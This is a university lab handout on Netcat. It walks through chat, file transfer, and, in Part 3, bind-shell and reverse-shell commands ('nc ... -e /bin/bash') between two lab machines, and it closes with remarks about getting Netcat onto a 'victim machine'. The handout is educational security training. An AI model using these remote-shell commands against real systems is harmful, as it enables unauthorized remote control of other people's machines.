Internet Security ECOM 5347 Lab 12

Introduction to using Netcat

Objectives To learn basic features of Netcat that using in security field.

Introduction : Netcat is a wonderfully versatile tool which has been dubbed the “hackers' Swiss army knife”. Netcat is a computer networking service for reading from and writing network connections using TCP or UDP ;this dual functionality suggests that Netcat runs in two modes: “client” and “server”. Netcat is designed to be a dependable “back-end” device that can be used candidly or easily driven by other programs and scripts. the same , it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.

Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.

Major features of Netcat are:

 Outbound or inbound connections, TCP or UDP, to or from any ports  Full DNS forward/reverse checking, with appropriate warnings  Ability to use any local source port  Ability to use any locally-configured network source address  Built-in port-scanning capabilities, with randomization  Built-in loose source-routing capability  Can read line arguments from standard input  Hex dump of transmitted and received data  Optional ability to let another program service established connections  Optional -options responder  Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel.

112

Internet Security ECOM 5347 Lab 12 NetCat

Lab Experiment Requirements: We need for this lab two machines , the first that runs BackTrack 3 and the other runs Windows XP .

Procedures :

Part 1 : Listening on a TCP/UDP port with Netcat Listening on a TCP/UDP port using Netcat is useful for network debugging client applications, or otherwise receiving a TCP/UDP network connection. Let's try implementing a simple chat using Netcat.

1. From Backtrack : we want to listen on port 4444 and accept incoming connections on this port , : nc -lvvp 4444 Check to see that port 4444 is indeed listening using netstat You will see listening on [any] 4444 ...

2. From Windows XP: connect to port 4444 on your Backtrack by typing nc -vv 10.10.136.85 4444

3. After connection established we can start chat as shown in Figure 1 and 2.

Figure 1 backtrack Netcat listening for port 4444 ; chat is opened after connection establishment

113

Internet Security ECOM 5347 Lab 12 NetCat

Figure 2 Windows XP establish connection with Backtrack ,then simple chat done

Part2 : Transferring files with Netcat Netcat can also be used to transfer files from one computer to another. This applies to text and binary files. In order to send a from Computer 2 to Computer 1, try the following:

1. From Backtrack : We'll set up Netcat to listen to and accept the connection and to redirect any input into a file.type nc -lvp 4444 > output.txt

2. In Windows machine we create text file secu.txt; then we connect to listening Netcat on computer 1 (port 4444) and send the file,type:

C:\>nc -vv 192.168.129.1 4444 < test.txt

3. The connection will established and the file will transferred to Backtrack and this is shown in figure 3 and 4

Figure 3 Backtrack listen to 4444 port and accept incoming connection from Windows XP to transfer file

114

Internet Security ECOM 5347 Lab 12 NetCat

Figure 4 Send the file via opened connection to backtrack

4. From backtrack : check that the file was transferred correctly , as shown in figure 5 type: out.txt

Figure 5 Check that the file correctly transferred

Part 3 : Remote Administration with Netcat (Remote Administration with Netcat): One of Netcat's neat features is command . This means that Netcat can take an exe file and redirect the input, output and error messages to a TCP/UDP port, rather than to the default console. Take for example the cmd.exe executable. By redirecting the stdin/stdout/stderr to the network, we can bind cmd.exe to a local port. Anyone connecting to this port will be presented with a command prompt belonging to this computer.

Bind Shell

1. From Backtrack : type C:\>nc -lvvp 4444 -e /bin/ ;so that Anyone connecting to port 4444 on this machine will be presented with command prompt, with the permissions that nc was run with. As shown in figure 6.

115

Internet Security ECOM 5347 Lab 12 NetCat

Figure 6 Bind shell that when anyone try to connect it will presented by command line

2. From Windows :type nc -v 10.10.36.144 4444 to connect to other machine that listening on port 4444 as illustrated in figure7 ; after connection established you will presented with the shell of Backtrack. Now we can use any available command as we in front of the remote PC.(as example : try ifconfig as shown in figure xxxxx) Remember that ifconfig is used only by that means we are sure that we remotely administer backtrack by its shell.

Figure 7 After connection ; trying ifconfig on the victim machine

Reverse shell Another interesting Netcat feature is the ability to send a command shell to a listening host. So in this situation, although Alice cannot bind a port to cmd.exe locally to her computer and expect Bob to connect, she can send her command prompt to Bob's machine.

1. From Windows :type nc -lvvp 5555 ; now windows is listening on port 5555 and waiting incoming connection. 2. From Backtrack: type nc -v 10.10.36.145 5555 -e /bin/bash ; now you try to connect to windows machine and send your shell (backtrack shell) to it. 3. After connection established we can use backtrack commands :

116

Internet Security ECOM 5347 Lab 12 NetCat

First I try to use unrecognized command , an error message of backtrack appears ; then I try ifconfig that give me the ip of backtrack.

Figures 8 and 9 shows this process before connection and after connection reversed with command line of backtrack and simple command execution from remote computer that run windows XP.

Figure 8 Windows xp connection on port 5555 ; after connection established the shell of the backtrack reveres to XP

Figure 9 Backtrack reverse his shell with the connection.

117

Internet Security ECOM 5347 Lab 12 NetCat

Conclusion: Netcat has other features and uses such as simple sniffing abilities, port redirection and others which you can learn about if you interested. Now How to I get Netcat to run on the victim machine, without remote user intervention? The answer to this question is simply “remote code execution”. Ninety percent of attack vectors can be summarized with the pair of words “code execution”. For example, attacks such as Buffer Overflows, SQL injection, File Inclusion, Client Side Attacks, Trojan Horses - all aim to result in “code execution” on the victim machine. Simple using for this will be presented in virus and Trojan experiments.

118